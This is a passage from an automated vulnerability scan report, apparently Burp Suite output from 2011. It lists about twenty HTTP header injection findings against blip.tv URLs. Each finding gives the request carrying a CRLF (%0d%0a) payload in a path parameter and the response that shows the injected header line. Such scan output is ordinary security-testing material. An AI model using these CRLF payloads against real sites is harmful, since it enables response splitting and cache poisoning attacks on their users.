41c0b66503e/4648488">
...[SNIP]...

2.63. http://blip.tv/file/4648488 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648488

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 355ea%0d%0a83299189f58 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/355ea%0d%0a83299189f58 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/355ea
83299189f58

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1324527973
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/355ea
83299189f58">her
...[SNIP]...

2.64. http://blip.tv/file/4650005 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4650005

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3418e%0d%0ae1c7f4e2e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3418e%0d%0ae1c7f4e2e20/4650005 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3418e
e1c7f4e2e20
/4650005
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046304
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3418e
e1c7f4e2e20/4650005">
...[SNIP]...

2.65. http://blip.tv/file/4650005 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4650005

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44404%0d%0a50fe40dacb2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/44404%0d%0a50fe40dacb2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/44404
50fe40dacb2

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046349
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/44404
50fe40dacb2">her
...[SNIP]...

2.66. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac072%0d%0a258f254ae06 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac072%0d%0a258f254ae06/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ac072
258f254ae06
/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527517
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ac072
258f254ae06/get/Ama20
...[SNIP]...

2.67. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 31917%0d%0aa0db1a8f74f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/31917%0d%0aa0db1a8f74f/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/31917
a0db1a8f74f
/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1025267014
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/31917
a0db1a8f74f/Ama2
...[SNIP]...

2.68. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c462e%0d%0af639ff48709 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/c462e%0d%0af639ff48709 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/c462e
f639ff48709

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1274881938
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/c462e
f639ff48709"
...[SNIP]...

2.69. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 108bb%0d%0a5a88d344650 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /108bb%0d%0a5a88d344650/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/108bb
5a88d344650
/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 344227222
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/108bb
5a88d344650/get/Ama20
...[SNIP]...

2.70. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4aab6%0d%0a56621af0bdb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/4aab6%0d%0a56621af0bdb/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/4aab6
56621af0bdb
/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1248905461
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/4aab6
56621af0bdb/Ama2
...[SNIP]...

2.71. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 74bb7%0d%0a5b28c074473 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/74bb7%0d%0a5b28c074473 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/74bb7
5b28c074473

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 2146045865
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/74bb7
5b28c074473"
...[SNIP]...

2.72. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d0a48%0d%0a04d7f7c54c3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d0a48%0d%0a04d7f7c54c3/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/d0a48
04d7f7c54c3
/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 326
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1025265403
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d0a48
04d7f7c54c3/get/Armch
...[SNIP]...

2.73. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 26ddf%0d%0aec507006938 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/26ddf%0d%0aec507006938/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/26ddf
ec507006938
/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 327
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1025265483
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/26ddf
ec507006938/Armc
...[SNIP]...

2.74. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 41209%0d%0ac3c45ea772d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/41209%0d%0ac3c45ea772d HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/41209
c3c45ea772d

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1498215508
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/41209
c3c45ea772d"
...[SNIP]...

2.75. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload be36f%0d%0a55b217f8a8e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /be36f%0d%0a55b217f8a8e/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/be36f
55b217f8a8e
/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 326
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1274880254
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/be36f
55b217f8a8e/get/Armch
...[SNIP]...

2.76. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b2f74%0d%0af13dc8c7cfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b2f74%0d%0af13dc8c7cfe/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b2f74
f13dc8c7cfe
/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 327
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1324525916
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b2f74
f13dc8c7cfe/Armc
...[SNIP]...

2.77. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 608af%0d%0ab546ec733c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/608af%0d%0ab546ec733c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/608af
b546ec733c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1324526006
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/608af
b546ec733c">
...[SNIP]...

2.78. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46a60%0d%0a03b1ec9fb4e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46a60%0d%0a03b1ec9fb4e/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/46a60
03b1ec9fb4e
/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 353
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1025266264
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/46a60
03b1ec9fb4e/get/Armch
...[SNIP]...

2.79. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ffbc0%0d%0a3d60c17a022 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/ffbc0%0d%0a3d60c17a022/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/ffbc0
3d60c17a022
/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 344226511
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/ffbc0
3d60c17a022/Armc
...[SNIP]...

2.80. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 51e7d%0d%0a4338ec52283 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/51e7d%0d%0a4338ec52283 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/51e7d
4338ec52283

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 1274881279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/51e7d
4338ec52283"
...[SNIP]...

2.81. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e0840%0d%0a13daeda52ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e0840%0d%0a13daeda52ad/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e0840
13daeda52ad
/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 1324526714
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e0840
13daeda52ad/get/Armch
...[SNIP]...

2.82. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7ed3d%0d%0a7f56045eacf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/7ed3d%0d%0a7f56045eacf/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
